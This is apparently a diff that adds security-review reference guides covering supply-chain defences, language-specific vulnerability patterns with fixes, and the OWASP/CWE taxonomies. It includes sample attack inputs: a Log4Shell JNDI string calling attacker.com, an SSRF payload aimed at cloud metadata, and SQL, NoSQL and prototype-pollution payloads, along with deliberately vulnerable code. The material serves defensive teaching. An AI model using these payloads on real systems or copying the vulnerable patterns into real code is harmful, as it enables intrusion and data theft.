+| Malicious CI action | Compromise a GitHub Action used in thousands of pipelines | `tj-actions/changed-files` CVE-2025-30066 — secrets exfiltrated |
+| Build system poisoning | Compromise the build infrastructure itself | SolarWinds SUNBURST (2020) — trojanized build output |
+| Protestware | Maintainer intentionally injects malicious or disruptive code | `node-ipc` (2022) — deleted files on Russian/Belarusian IPs |
+
+### Lock File Analysis
+
+Lock files (`package-lock.json`, `yarn.lock`, `Pipfile.lock`, `go.sum`, `Cargo.lock`) pin exact resolved versions and integrity hashes. They are the primary defense against version-range attacks.
+
+**Rules:**
+
+- Always commit lock files. Never add them to `.gitignore`.
+- Use `npm ci` in CI, not `npm install`. `npm ci` installs exactly what the lock file specifies and fails if `package.json` and the lock file are out of sync.
+- Review lock file diffs in every pull request. An unexpected new dependency or a version change in a transitive package is a signal worth investigating.
+- Verify `integrity` fields in `package-lock.json` are present and use `sha512`. A missing or `sha1`-only integrity hash is a red flag.
+
+```bash
+# Reproducible install in CI
+npm ci
+
+# Detect lock file drift (fails if lock file would change)
+npm install --frozen-lockfile   # yarn
+pip install --require-hashes -r requirements.txt  # pip
+```
+
+**Reviewing lock file diffs:** When a PR modifies `package-lock.json`, verify: (1) the change was intentional; (2) no new packages appear that are absent from `package.json`; (3) no existing package changed its resolved URL or integrity hash without a version bump.
+
+### Detection and Prevention
+
+**Pin GitHub Actions by commit SHA:**
+
+```yaml
+# Vulnerable — tag can be moved to a different commit
+- uses: actions/checkout@v4
+
+# Safe — SHA is immutable
+- uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683
+```
+
+Use a tool such as `pin-github-action` or Dependabot's `github-actions` ecosystem support to automate SHA pinning and updates.
+
+**Verify npm package provenance:**
+
+```bash
+npm audit signatures
+```
+
+Packages published with provenance attestations (npm 9.5+) include a link to the source repository and CI run that produced them. Verify provenance for critical dependencies.
+
+**SLSA provenance verification:**
+
+SLSA (Supply-chain Levels for Software Artifacts) defines four levels of build integrity. Level 3 requires a hermetic, reproducible build with signed provenance.
+
+```bash
+# Verify SLSA provenance for a GitHub release artifact
+gh attestation verify artifact.tar.gz --owner org-name
+
+# Verify using slsa-verifier
+slsa-verifier verify-artifact artifact.tar.gz \
+  --provenance-path artifact.tar.gz.intoto.jsonl \
+  --source-uri github.com/org/repo
+```
+
+**OSV-Scanner — open-source vulnerability database:**
+
+```bash
+# Install
+go install github.com/google/osv-scanner/cmd/osv-scanner@latest
+
+# Scan lock files
+osv-scanner --lockfile=package-lock.json
+osv-scanner --lockfile=requirements.txt
+osv-scanner --lockfile=go.sum
+
+# Recursive scan of a directory
+osv-scanner -r .
+```
+
+OSV-Scanner queries the Open Source Vulnerabilities database, aggregating CVEs, GitHub Security Advisories, and ecosystem-specific advisories.
+
+**Socket.dev — supply chain attack detection in PRs:** Analyzes package behavior (network access, filesystem access, obfuscated code, install scripts) rather than CVE databases alone. Install the GitHub App to receive PR comments when a dependency change introduces suspicious behavior.
+
+---
+
+## Triage Workflow
+
+Not every vulnerability requires immediate remediation. Apply a consistent triage process to prioritize effort and document accepted risks.
+
+**Step 1: Determine dependency type.** Direct dependencies are under your control; update them. Transitive dependencies require updating the direct dependency that pulls them in, using an `overrides`/`resolutions` field, or accepting the risk.
+
+**Step 2: Assess reachability.** Is the vulnerable code path actually invoked? Use `govulncheck` (Go) or manual code review to confirm. A vulnerability in a JSON parser is not exploitable if your application never passes untrusted input to it.
+
+**Step 3: Check fix availability.**
+
+```bash
+# npm — show available fix
+npm audit --json | jq '.vulnerabilities | to_entries[] | {name: .key, fixAvailable: .value.fixAvailable}'
+
+# pip-audit — show fix version
+pip-audit --format json | jq '.[] | {name: .name, fix: .fix_versions}'
+```
+
+**Step 4: Apply the fix or mitigate.**
+
+| Situation | Action |
+|-----------|--------|
+| Fix available, no breaking change | Upgrade immediately |
+| Fix available, breaking change | Schedule upgrade, add regression tests |
+| No fix, vulnerability reachable | Apply WAF rule, input validation, or disable feature |
+| No fix, vulnerability unreachable | Document and accept; set a review date |
+
+**Step 5: Document accepted risks.**
+
+Every suppressed finding must have a documented rationale, owner, and review date.
+
+```
+# .trivyignore
+# CVE-2024-12345
+# Reason: vulnerable function is not called; confirmed by govulncheck
+# Owner: security@example.com
+# Review date: 2025-06-01
+CVE-2024-12345
+```
+
+**Triage decision matrix:**
+
+| Reachability | Fix Available | Action |
+|-------------|---------------|--------|
+| Reachable | Yes | Upgrade immediately (P1 for CRITICAL, P2 for HIGH) |
+| Reachable | No | Mitigate via WAF/config; escalate to vendor; set SLA |
+| Unreachable | Yes | Upgrade in next sprint to reduce noise |
+| Unreachable | No | Document and accept; suppress with expiry comment |
+
+**Recommended SLA defaults:** Critical/reachable — 24 hours. High/reachable — 7 days. Medium/reachable — 30 days. Low — 90 days or next major release. Tighten for internet-facing services handling sensitive data.

--- a/skills/security-review/references/language-vulnerability-patterns.md
+++ b/skills/security-review/references/language-vulnerability-patterns.md
@@ -1,0 +1,392 @@
+# Language-Specific Vulnerability Patterns
+
+Sources: OWASP Cheat Sheet Series, MITRE CWE database, Semgrep rule patterns, Trail of Bits security audit reports
+
+Covers: Language-specific exploit patterns and detection heuristics for JavaScript/TypeScript, Python, Go, Rust, and Java/Kotlin — with vulnerable and fixed code examples per pattern, plus a cross-language reference table.
+
+---
+
+## JavaScript / TypeScript
+
+### XSS (Cross-Site Scripting)
+
+**DOM-based XSS** — `innerHTML` assignment executes attacker-controlled markup.
+
+```js
+// VULNERABLE
+element.innerHTML = "Hello, " + req.query.name;
+```
+
+Fix: Use `textContent` for plain text, or `DOMPurify.sanitize()` if HTML is required.
+
+**Reflected XSS** — template literal interpolation into server-rendered HTML bypasses escaping.
+
+```js
+// VULNERABLE
+res.send(`<h1>Results for: ${req.query.q}</h1>`);
+```
+
+Fix: Use a templating engine with auto-escaping (Nunjucks, Handlebars).
+
+**React `dangerouslySetInnerHTML`** — the prop name is a warning, not a safeguard.
+
+```tsx
+// VULNERABLE
+<div dangerouslySetInnerHTML={{ __html: userHtml }} />
+```
+
+Fix: Sanitize with `DOMPurify.sanitize()` before rendering.
+
+Detection signals: `innerHTML`, `outerHTML`, `document.write`, `dangerouslySetInnerHTML`, `insertAdjacentHTML`.
+
+---
+
+### Prototype Pollution
+
+Merging user-controlled objects can overwrite `Object.prototype`, affecting every object in the process.
+
+```js
+// VULNERABLE — recursive merge with user input
+function merge(target, source) {
+  for (const key of Object.keys(source)) {
+    if (typeof source[key] === "object") merge(target[key] ??= {}, source[key]);
+    else target[key] = source[key];
+  }
+}
+merge({}, JSON.parse(req.body)); // body: {"__proto__":{"isAdmin":true}}
+```
+
+Fix: Block dangerous keys (`__proto__`, `constructor`, `prototype`) or use `Object.create(null)`.
+
+---
+
+### ReDoS (Regular Expression Denial of Service)
+
+Nested quantifiers on overlapping character classes cause exponential backtracking.
+
+```js
+// VULNERABLE — hangs on "aaaaaaaaaaaaaaaaaaaaa!"
+const re = /^([a-zA-Z0-9]+)*@/;
+re.test(req.query.email);
+```
+
+Fix: Use validated libraries (validator.js) or enforce length limits before matching.
+
+---
+
+### Server-Side JavaScript
+
+**Code injection:**
+
+```js
+// VULNERABLE
+eval(req.body.expression);
+new Function("x", req.body.code)();
+```
+
+Fix: Use sandboxed evaluators (mathjs) or strict allowlists.
+
+**Command injection:**
+
+```js
+// VULNERABLE — shell expansion enables injection
+exec(`convert ${req.query.file} output.png`);
+```
+
+Fix: Use `execFile()` with array args; no shell.
+
+**Path traversal:**
+
+```js
+// VULNERABLE — path.join does not prevent escaping the base directory
+const p = path.join(__dirname, "uploads", req.params.name);
+```
+
+Fix: Resolve and verify prefix with `startsWith()`.
+
+**NoSQL injection:**
+
+```js
+// VULNERABLE — object spread passes operators directly
+db.collection("users").findOne({ ...req.body });
+// body: {"password":{"$gt":""}} matches any password
+```
+
+Fix: Extract and type-check scalar fields only.
+
+**Dependency lifecycle scripts:** `npm install` executes `postinstall` scripts. Use `npm install --ignore-scripts` in CI.
+
+---
+
+## Python
+
+### Server-Side Template Injection (SSTI)
+
+Constructing Jinja2 templates from user input allows arbitrary Python execution.
+
+```python
+# VULNERABLE
+return Template(f"Hello {request.args['name']}").render()
+```
+
+Fix: Pass data as template variables via `render_template()`, never build template source from input.
+
+---
+
+### Pickle Deserialization
+
+`pickle.loads` executes arbitrary Python during object reconstruction.
+
+```python
+# VULNERABLE
+obj = pickle.loads(request.get_data())  # RCE
+```
+
+Fix: Use JSON for untrusted data. If pickle is required, verify an HMAC signature first.
+
+---
+
+### Command Injection
+
+```python
+# VULNERABLE
+os.system(f"convert {filename} output.png")
+subprocess.run(f"ls {directory}", shell=True)
+```
+
+Fix: Use `subprocess.run()` with `shell=False` and a list of arguments.
+
+---
+
+### SQL Injection
+
+```python
+# VULNERABLE
+cursor.execute(f"SELECT * FROM users WHERE id = {uid}")
+```
+
+Fix: Use parameterized queries: `cursor.execute("SELECT * FROM users WHERE id = %s", (uid,))`.
+
+---
+
+### YAML Deserialization
+
+```python
+# VULNERABLE
+data = yaml.load(user_input)  # RCE
+```
+
+Fix: Use `yaml.safe_load()` to restrict to safe types only.
+
+---
+
+### Path Traversal
+
+```python
+# VULNERABLE
+with open(os.path.join(UPLOAD_DIR, request.args["filename"])) as f:
+    return f.read()
+```
+
+Fix: Resolve symlinks and verify prefix: `os.path.realpath()` then `startswith()` check.
+
+---
+
+## Go
+
+### Race Conditions
+
+Concurrent goroutine access to maps and slices without synchronization is undefined behavior.
+
+```go
+// VULNERABLE
+var cache = map[string]string{}
+go func() { cache[r.URL.Path] = "visited" }() // data race
+```
+
+Fix: Use `sync.RWMutex` or `sync.Map`. Run `go test -race ./...` to detect.
+
+---
+
+### Integer Overflow
+
+```go
+// VULNERABLE — int64 to int32 truncation without bounds check
+buf := make([]byte, int32(n)) // n=4294967296 → buf size 0
+```
+
+Fix: Validate range before conversion: `if n < 0 || n > math.MaxInt32 { return error }`.
+
+---
+
+### Improper Error Handling and SQL Injection
+
+```go
+// VULNERABLE — discarded error; SQL injection via fmt.Sprintf
+query := fmt.Sprintf("SELECT * FROM users WHERE name = '%s'", name)
+rows, _ := db.Query(query)
+```
+
+Fix: Handle errors and use parameterized queries: `db.Query("SELECT * FROM users WHERE name = ?", name)`.
+
+---
+
+### Path Traversal
+
+```go
+// VULNERABLE — filepath.Join does not prevent escaping the base directory
+p := filepath.Join("/var/www/uploads", r.URL.Query().Get("name"))
+```
+
+Fix: Clean the path and verify it stays within the base directory using prefix check.
+
+---
+
+### HTTP Server Defaults
+
+```go
+// VULNERABLE — no timeouts; susceptible to slowloris DoS
+http.ListenAndServe(":8080", mux)
+```
+
+Fix: Configure `ReadTimeout`, `WriteTimeout`, and `IdleTimeout` on `http.Server`.
+
+---
+
+## Rust
+
+### Unsafe Blocks
+
+`unsafe` opts out of Rust's memory safety guarantees. Every `unsafe` block is a potential vulnerability surface.
+
+```rust
+// VULNERABLE — raw pointer dereference without null check
+unsafe fn read_value(ptr: *const u32) -> u32 { *ptr }
+```
+
+Fix: Validate pointer before dereferencing: check for null, dangling, alignment, and lifetime validity.
+
+---
+
+### FFI (Foreign Function Interface)
+
+Calling C libraries via FFI inherits all C memory safety issues.
+
+```rust
+// VULNERABLE — Rust &str is not null-terminated; C reads past the end
+unsafe { c_process(input.as_ptr()) }
+```
+
+Fix: Use `CString::new()` to create null-terminated C strings before passing to FFI.
+
+---
+
+### Panic in Libraries
+
+`unwrap()` and `expect()` terminate the process. In library code this violates the API contract.
+
+```rust
+// VULNERABLE — library panics on bad input
+pub fn parse_port(s: &str) -> u16 { s.parse().unwrap() }
+```
+
+Fix: Return `Result<T, E>` to propagate errors to the caller.
+
+---
+
+### Integer Overflow
+
+In release builds, integer overflow wraps silently. Debug builds panic.
+
+```rust
+// VULNERABLE — wraps in release mode
+fn compute_offset(base: u32, delta: u32) -> u32 { base + delta }
+```
+
+Fix: Use `checked_add()`, `saturating_add()`, or `overflowing_add()` for security-sensitive calculations.
+
+---
+
+## Java / Kotlin
+
+### Deserialization
+
+Java's native deserialization executes code during object reconstruction. Gadget chains in common libraries enable RCE.
+
+```java
+// VULNERABLE
+Object obj = new ObjectInputStream(request.getInputStream()).readObject();
+```
+
+Fix: Use JSON with a specific target type. If native deserialization is unavoidable, apply an `ObjectInputFilter` allowlist.
+
+---
+
+### JNDI Injection (Log4Shell Pattern)
+
+Log4j 2.x performs JNDI lookups in log messages by default (CVE-2021-44228).
+
+```java
+// VULNERABLE — logging user-controlled input with Log4j < 2.17.1
+logger.info("Login: {}", request.getHeader("X-Forwarded-For"));
+// Header: ${jndi:ldap://attacker.com/exploit} → RCE
+```
+
+Fix: Upgrade to Log4j 2.17.1+, or set `-Dlog4j2.formatMsgNoLookups=true`.
+
+---
+
+### SQL Injection in JPA / HQL
+
+String concatenation in JPQL is as dangerous as raw SQL.
+
+```java
+// VULNERABLE
+String jpql = "SELECT u FROM User u WHERE u.name = '" + name + "'";
+em.createQuery(jpql, User.class).getResultList();
+```
+
+Fix: Use named parameters: `.createQuery("SELECT u FROM User u WHERE u.name = :name", User.class).setParameter("name", name)`.
+
+---
+
+### XML External Entity (XXE)
+
+Default Java XML parsers resolve external entities, enabling file disclosure and SSRF.
+
+```java
+// VULNERABLE — default DocumentBuilder resolves external entities
+DocumentBuilder db = DocumentBuilderFactory.newInstance().newDocumentBuilder();
+Document doc = db.parse(request.getInputStream());
+```
+
+Fix: Disable DTDs and external entities via `setFeature()` calls on `DocumentBuilderFactory`.
+
+---
+
+## Cross-Language Patterns
+
+The following vulnerability classes appear in every language. The underlying weakness is the same; only the syntax differs.
+
+| Vulnerability | CWE | JavaScript | Python | Go | Rust | Java |
+|---|---|---|---|---|---|---|
+| SQL Injection | CWE-89 | Template literals in queries | f-strings in `cursor.execute` | `fmt.Sprintf` in SQL | `format!` in queries | String concat in JPQL |
+| Command Injection | CWE-78 | `exec(userInput)` | `shell=True` with input | `exec.Command` with shell string | `Command::new("sh")` | `Runtime.exec(string)` |
+| Path Traversal | CWE-22 | `path.join` without prefix check | `os.path.join` without `realpath` | `filepath.Join` without prefix check | `Path::new(base).join(input)` | `new File(base, input)` |
+| Insecure Deserialization | CWE-502 | `JSON.parse` + prototype pollution | `pickle.loads` | `encoding/gob` from untrusted source | `serde` with `untagged` enums | `ObjectInputStream` |
+| Hardcoded Secrets | CWE-798 | `const API_KEY = "sk-..."` | `PASSWORD = "hunter2"` | `const secret = "..."` | `const SECRET: &str = "..."` | `String password = "..."` |
+| SSRF | CWE-918 | `fetch(req.body.url)` | `requests.get(user_url)` | `http.Get(userURL)` | `reqwest::get(url)` | `new URL(userInput).openStream()` |
+| Missing Input Validation | CWE-20 | No type/length checks before use | No type checks on `request.args` | No bounds checks on parsed values | `unwrap()` on parse | No `@Valid` on controller params |
+| Weak Cryptography | CWE-327 | `crypto.createHash("md5")` | `hashlib.md5(` | `crypto/md5` for passwords | `md5` crate for secrets | `MessageDigest.getInstance("MD5")` |
+| Insufficient Logging | CWE-778 | No logging on auth failure | No audit trail on sensitive ops | Errors discarded with `_` | Silently swallowed `Err` | Empty `catch` blocks |
+| Missing Output Encoding | CWE-116 | `innerHTML = data` | `Markup(user_input)` in Jinja2 | `template.HTML(userInput)` | Format string with raw input | `response.getWriter().print(input)` |
+
+### Universal Detection Rules
+
+Apply these checks regardless of language:
+
+1. **Trace user input to sinks.** Every external input must be traced to sinks (SQL, shell, file system, HTML output, deserialization, network requests).
+2. **Flag deprecated cryptographic algorithms.** MD5, SHA-1, DES, RC4, and ECB mode are unacceptable for any security purpose.
+3. **Scan for hardcoded secrets.** High-entropy strings, common prefixes (`sk-`, `AKIA`, `-----BEGIN`), and variable names (`password`, `secret`, `token`, `key`) assigned string literals.
+4. **Audit silent error handling.** Swallowed exceptions and ignored return values hide security-relevant failures.
+5. **Review unpinned or unaudited dependencies.** Run `npm audit`, `pip-audit`, `govulncheck`, or `cargo audit` as part of every review.

--- a/skills/security-review/references/owasp-vulnerability-taxonomy.md
+++ b/skills/security-review/references/owasp-vulnerability-taxonomy.md
@@ -1,0 +1,362 @@
+# OWASP Vulnerability Taxonomy
+
+Sources: OWASP Foundation (Top 10 2021, API Security Top 10 2023), MITRE (CWE Top 25 2024), OWASP ASVS 4.0
+
+Covers: Web application vulnerabilities (OWASP Top 10), API-specific attack surfaces (API Security Top 10), software weakness enumeration (CWE Top 25), verification rigor levels (ASVS), and manual finding classification using CVSS-aligned severity.
+
+---
+
+## OWASP Top 10 (2021)
+
+The OWASP Top 10 is the canonical risk-ranked list of web application security categories. Each entry maps to one or more CWEs and represents a class of vulnerabilities, not a single flaw.
+
+### Risk Rankings
+
+| Rank | Category | Primary CWEs | Description |
+|------|----------|-------------|-------------|
+| A01 | Broken Access Control | CWE-200, CWE-201, CWE-352, CWE-862, CWE-863 | Users act outside their intended permissions — vertical privilege escalation, horizontal access to other users' data, CORS misconfiguration, force-browsing to authenticated pages |
+| A02 | Cryptographic Failures | CWE-259, CWE-327, CWE-331 | Sensitive data exposed in transit or at rest due to weak or absent encryption — cleartext transmission, deprecated algorithms (MD5, SHA-1, DES), hardcoded keys |
+| A03 | Injection | CWE-77, CWE-78, CWE-89, CWE-416 | Hostile data sent to an interpreter as part of a command or query — SQL, OS command, LDAP, XPath, NoSQL, ORM injection |
+| A04 | Insecure Design | CWE-73, CWE-183, CWE-209, CWE-256, CWE-501, CWE-522 | Missing or ineffective security controls by design — no rate limiting, insecure password recovery flows, missing business logic validation |
+| A05 | Security Misconfiguration | CWE-2, CWE-11, CWE-13, CWE-15, CWE-16 | Insecure default configurations, incomplete setup, open cloud storage, verbose error messages, unnecessary features enabled |
+| A06 | Vulnerable and Outdated Components | CWE-1035, CWE-1104 | Components (libraries, frameworks, OS) with known vulnerabilities used without version management or patch discipline |
+| A07 | Identification and Authentication Failures | CWE-255, CWE-259, CWE-287, CWE-288, CWE-290, CWE-294, CWE-295, CWE-297, CWE-300, CWE-302, CWE-304, CWE-306, CWE-307, CWE-346, CWE-384, CWE-521, CWE-613, CWE-620, CWE-640, CWE-798, CWE-940, CWE-1216 | Broken authentication — credential stuffing, brute force, weak passwords, session fixation, missing MFA |
+| A08 | Software and Data Integrity Failures | CWE-345, CWE-353, CWE-426, CWE-494, CWE-502, CWE-565, CWE-784, CWE-829, CWE-830 | Code and infrastructure without integrity verification — insecure deserialization, unsigned updates, CI/CD pipeline poisoning |
+| A09 | Security Logging and Monitoring Failures | CWE-117, CWE-223, CWE-532, CWE-778 | Insufficient logging, monitoring, and alerting — attacks go undetected, audit trails missing, logs not protected from tampering |
+| A10 | Server-Side Request Forgery (SSRF) | CWE-918 | Server fetches a remote resource using attacker-supplied URL — internal network scanning, cloud metadata exfiltration, service-to-service bypass |
+
+### Vulnerable Code Patterns by Category
+
+**A01 — Broken Access Control**
+```python
+# Missing authorization check — any authenticated user can access any order
+@app.get("/orders/{order_id}")
+def get_order(order_id: int, current_user: User = Depends(get_current_user)):
+    return db.query(Order).filter(Order.id == order_id).first()
+    # MISSING: filter(Order.user_id == current_user.id)
+```
+
+**A02 — Cryptographic Failures**
+```python
+# MD5 for password hashing — broken, reversible via rainbow tables
+import hashlib
+hashed = hashlib.md5(password.encode()).hexdigest()
+db.save_user(username, hashed)
+```
+
+**A03 — Injection (SQL)**
+```python
+# String interpolation directly into SQL query
+query = f"SELECT * FROM users WHERE username = '{username}' AND password = '{password}'"
+cursor.execute(query)
+# Input: username = "admin' --" bypasses password check entirely
+```
+
+**A04 — Insecure Design**
+```python
+# Password reset with predictable token — no expiry, no single-use enforcement
+def generate_reset_token(user_id):
+    return hashlib.md5(f"{user_id}{user.email}".encode()).hexdigest()
+```
+
+**A05 — Security Misconfiguration**
+```python
+# Debug mode enabled in production — exposes stack traces and environment
+app = Flask(__name__)
+app.run(debug=True, host="0.0.0.0")
+```
+
+**A06 — Vulnerable Components**
+```json
+{
+  "dependencies": {
+    "lodash": "4.17.4",
+    "express": "4.16.0"
+  }
+}
+```
+`lodash@4.17.4` is vulnerable to prototype pollution (CVE-2019-10744). Pin to patched versions and audit regularly.
+
+**A07 — Identification and Authentication Failures**
+```python
+# No rate limiting on login — enables credential stuffing
+@app.post("/login")
+def login(username: str, password: str):
+    user = authenticate(username, password)
+    return {"token": create_token(user)} if user else {"error": "invalid"}
+```
+
+**A08 — Software and Data Integrity Failures**
+```python
+# Deserializing untrusted data with pickle — arbitrary code execution
+import pickle
+data = pickle.loads(request.body)  # attacker controls request.body
+```
+
+**A09 — Security Logging and Monitoring Failures**
+```python
+# Authentication failure logged without context — no IP, no username, no timestamp
+except AuthError:
+    logger.debug("login failed")  # insufficient; no actionable data
+    return 401
+```
+
+**A10 — SSRF**
+```python
+# Fetching user-supplied URL without validation
+@app.get("/fetch")
+def fetch_url(url: str):
+    response = requests.get(url)  # attacker supplies http://169.254.169.254/latest/meta-data/
+    return response.text
+```
+
+---
+
+## OWASP API Security Top 10 (2023)
+
+APIs expose different attack surfaces than traditional web applications. Object-level and property-level authorization failures dominate because APIs return structured data that clients consume directly.
+
+### API Risk Rankings
+
+| Rank | Category | Description | Key Signal |
+|------|----------|-------------|------------|
+| API1:2023 | Broken Object Level Authorization (BOLA) | API endpoints accept object IDs without verifying the caller owns or has access to that object | `GET /api/invoices/4521` returns another user's invoice |
+| API2:2023 | Broken Authentication | Authentication mechanisms implemented incorrectly — weak tokens, missing expiry, no brute-force protection | JWT with `alg: none` accepted; tokens never expire |
+| API3:2023 | Broken Object Property Level Authorization | API exposes more object properties than the caller should see, or allows mass assignment of protected fields | `PUT /users/me` with `{"role": "admin"}` succeeds |
+| API4:2023 | Unrestricted Resource Consumption | No limits on request rate, payload size, or resource allocation — enables DoS and financial abuse | No pagination, no rate limit on expensive search endpoint |
+| API5:2023 | Broken Function Level Authorization | Administrative or privileged endpoints accessible to regular users due to missing role checks | `DELETE /api/admin/users/{id}` returns 200 for non-admin |
+| API6:2023 | Unrestricted Access to Sensitive Business Flows | Automated abuse of legitimate business flows — bulk account creation, scalping, credential stuffing | No CAPTCHA or rate limit on account registration |
+| API7:2023 | Server Side Request Forgery | API fetches resources from attacker-supplied URLs — same as A10 but via API parameters | `POST /webhooks` with `url: http://internal-service/admin` |
+| API8:2023 | Security Misconfiguration | Insecure defaults, missing headers, permissive CORS, verbose errors, unpatched systems | `Access-Control-Allow-Origin: *` on authenticated endpoints |
+| API9:2023 | Improper Inventory Management | Outdated, undocumented, or shadow API versions exposed — old versions lack current security controls | `/api/v1/users` still active after `/api/v3/users` deployed |
+| API10:2023 | Unsafe Consumption of APIs | Application trusts third-party API responses without validation — SSRF via redirect, injection via response data | SQL query built from unvalidated third-party API response field |
+
+### BOLA vs BFLA Distinction
+
+| Type | What is bypassed | Example |
+|------|-----------------|---------|
+| BOLA (API1) | Object ownership check | User A reads User B's private messages |
+| BFLA (API5) | Function/role permission | Regular user calls admin-only delete endpoint |
+| BOPLA (API3) | Property-level filter | Response includes `password_hash`, `internal_notes` |
+
+### API Authentication Failure Patterns
+
+| Pattern | CWE | Risk |
+|---------|-----|------|
+| JWT `alg: none` accepted | CWE-347 | Critical — token forgery |
+| JWT secret is weak/default | CWE-521 | Critical — offline brute force |
+| Token never expires | CWE-613 | High — stolen token valid forever |
+| API key in URL parameter | CWE-598 | High — logged in server/proxy logs |
+| No refresh token rotation | CWE-384 | Medium — session fixation |
+| Missing token on sensitive endpoints | CWE-306 | Critical — unauthenticated access |
+
+---
+
+## CWE Top 25 (2024)
+
+The MITRE CWE Top 25 ranks software weaknesses by prevalence and severity in real-world CVEs. Use this list to prioritize what to look for during code review.
+
+### Full Rankings
+
+| Rank | CWE ID | Name | OWASP Mapping | Score |
+|------|--------|------|---------------|-------|
+| 1 | CWE-79 | Improper Neutralization of Input During Web Page Generation (XSS) | A03 Injection | 56.92 |
+| 2 | CWE-787 | Out-of-bounds Write | — (memory safety) | 45.20 |
+| 3 | CWE-89 | Improper Neutralization of Special Elements in SQL Commands (SQL Injection) | A03 Injection | 35.88 |
+| 4 | CWE-416 | Use After Free | — (memory safety) | 32.52 |
+| 5 | CWE-78 | Improper Neutralization of Special Elements in OS Commands (OS Command Injection) | A03 Injection | 19.55 |
+| 6 | CWE-20 | Improper Input Validation | A03, A04 | 19.14 |
+| 7 | CWE-125 | Out-of-bounds Read | — (memory safety) | 17.67 |
+| 8 | CWE-22 | Improper Limitation of a Pathname to a Restricted Directory (Path Traversal) | A01, A05 | 15.39 |
+| 9 | CWE-352 | Cross-Site Request Forgery (CSRF) | A01 Broken Access Control | 14.69 |
+| 10 | CWE-434 | Unrestricted Upload of File with Dangerous Type | A04, A05 | 11.73 |
+| 11 | CWE-862 | Missing Authorization | A01 Broken Access Control | 11.15 |
+| 12 | CWE-476 | NULL Pointer Dereference | — (memory safety) | 10.22 |
+| 13 | CWE-287 | Improper Authentication | A07 Auth Failures | 9.45 |
+| 14 | CWE-190 | Integer Overflow or Wraparound | — (memory safety) | 9.27 |
+| 15 | CWE-502 | Deserialization of Untrusted Data | A08 Integrity Failures | 9.09 |
+| 16 | CWE-77 | Improper Neutralization of Special Elements in a Command (Command Injection) | A03 Injection | 8.89 |
+| 17 | CWE-119 | Improper Restriction of Operations within Bounds of a Memory Buffer | — (memory safety) | 8.52 |
+| 18 | CWE-798 | Use of Hard-coded Credentials | A07 Auth Failures | 8.23 |
+| 19 | CWE-918 | Server-Side Request Forgery (SSRF) | A10 SSRF | 7.93 |
+| 20 | CWE-306 | Missing Authentication for Critical Function | A07 Auth Failures | 7.62 |
+| 21 | CWE-362 | Concurrent Execution Using Shared Resource with Improper Synchronization (Race Condition) | A04 Insecure Design | 7.01 |
+| 22 | CWE-269 | Improper Privilege Management | A01 Broken Access Control | 6.74 |
+| 23 | CWE-94 | Improper Control of Generation of Code (Code Injection) | A03 Injection | 6.39 |
+| 24 | CWE-863 | Incorrect Authorization | A01 Broken Access Control | 6.08 |
+| 25 | CWE-276 | Incorrect Default Permissions | A05 Misconfiguration | 5.82 |
+
+### High-Priority CWEs for Web/API Code Review
+
+Focus on these during manual review of interpreted languages (Python, JavaScript, Ruby, PHP, Java):
+
+| CWE | Detection Signal | Where to Look |
+|-----|-----------------|---------------|
+| CWE-89 (SQLi) | String concatenation with user input near DB calls | ORM raw queries, `execute()`, `query()` |
+| CWE-79 (XSS) | Unescaped user data rendered in HTML/JS | Template engines, `innerHTML`, `dangerouslySetInnerHTML` |
+| CWE-78 (OS Cmd Injection) | User input passed to shell execution | `subprocess`, `exec()`, `system()`, `popen()` |
+| CWE-22 (Path Traversal) | User-controlled filename or path | File read/write, `open()`, `sendFile()` |
+| CWE-502 (Deserialization) | Untrusted data deserialized | `pickle.loads()`, `yaml.load()`, Java `ObjectInputStream` |
+| CWE-918 (SSRF) | User-supplied URL fetched by server | `requests.get(url)`, `fetch(url)`, `curl` wrappers |
+| CWE-352 (CSRF) | State-changing requests without token | POST/PUT/DELETE endpoints, form submissions |
+| CWE-862 (Missing Authorization) | No ownership/role check before data access | Every data-returning endpoint |
+| CWE-798 (Hardcoded Credentials) | Literal secrets in source | Config files, constants, test fixtures |
+| CWE-434 (Unrestricted Upload) | File upload without type/content validation | Upload endpoints, multipart form handlers |
+
+---
+
+## ASVS Verification Levels
+
+The OWASP Application Security Verification Standard (ASVS) defines three levels of verification rigor. Use the level to scope a security review engagement.
+
+### Level Definitions
+
+| Level | Name | Target Application | Verification Approach |
+|-------|------|-------------------|----------------------|
+| L1 | Opportunistic | All software | Automated scanning, basic manual checks, penetration testing |
+| L2 | Standard | Applications handling sensitive data (PII, financial, health) | Thorough manual review, threat modeling, automated + manual testing |
+| L3 | Advanced | Critical infrastructure, high-value targets, safety-critical systems | Full architecture review, source code audit, formal verification where applicable |
+
+### Level Rigor Comparison
+
+| Dimension | L1 | L2 | L3 |
+|-----------|----|----|-----|
+| Automated scanning | Required | Required | Required |
+| Manual code review | Spot-check | Thorough | Exhaustive |
+| Threat modeling | Optional | Required | Required |
+| Architecture review | No | Partial | Full |
+| Cryptographic review | Basic | Standard | Expert |
+| Business logic review | No | Yes | Yes |
+| Supply chain review | No | Partial | Full |
+| Typical engagement length | Hours | Days | Weeks |
+
+### ASVS 14 Verification Areas
+
+| # | Area | Key Concerns | Minimum Level |
+|---|------|-------------|---------------|
+| V1 | Architecture, Design, Threat Modeling | Secure design principles, trust boundaries, data flow | L2 |
+| V2 | Authentication | Credential storage, MFA, account recovery, session management | L1 |
+| V3 | Session Management | Token generation, expiry, binding, logout | L1 |
+| V4 | Access Control | Least privilege, RBAC enforcement, path-based access | L1 |
+| V5 | Validation, Sanitization, Encoding | Input validation, output encoding, injection prevention | L1 |
+| V6 | Stored Cryptography | Algorithm selection, key management, password hashing | L1 |
+| V7 | Error Handling and Logging | Log completeness, log protection, error disclosure | L1 |
+| V8 | Data Protection | Sensitive data classification, at-rest encryption, data minimization | L2 |
+| V9 | Communication | TLS configuration, certificate validation, HSTS | L1 |
+| V10 | Malicious Code | Backdoors, time bombs, obfuscated logic, supply chain | L3 |
+| V11 | Business Logic | Rate limiting, workflow enforcement, anti-automation | L2 |
+| V12 | Files and Resources | Upload validation, path traversal, resource limits | L1 |
+| V13 | API and Web Service | REST/GraphQL/SOAP security, schema validation, versioning | L1 |
+| V14 | Configuration | Dependency management, build pipeline, secrets management | L2 |
+
+### Selecting the Right Level
+
+Apply L1 as the baseline for every engagement. Escalate to L2 when the application:
+- Processes personally identifiable information (PII)
+- Handles financial transactions or payment card data
+- Stores health or medical records
+- Provides authentication services for other systems
+
+Escalate to L3 when the application:
+- Is critical national infrastructure
+- Controls physical systems (SCADA, medical devices, vehicles)
+- Provides security services (identity providers, HSMs, PKI)
+- Has regulatory requirements mandating formal assurance (Common Criteria, FIPS 140)
+
+---
+
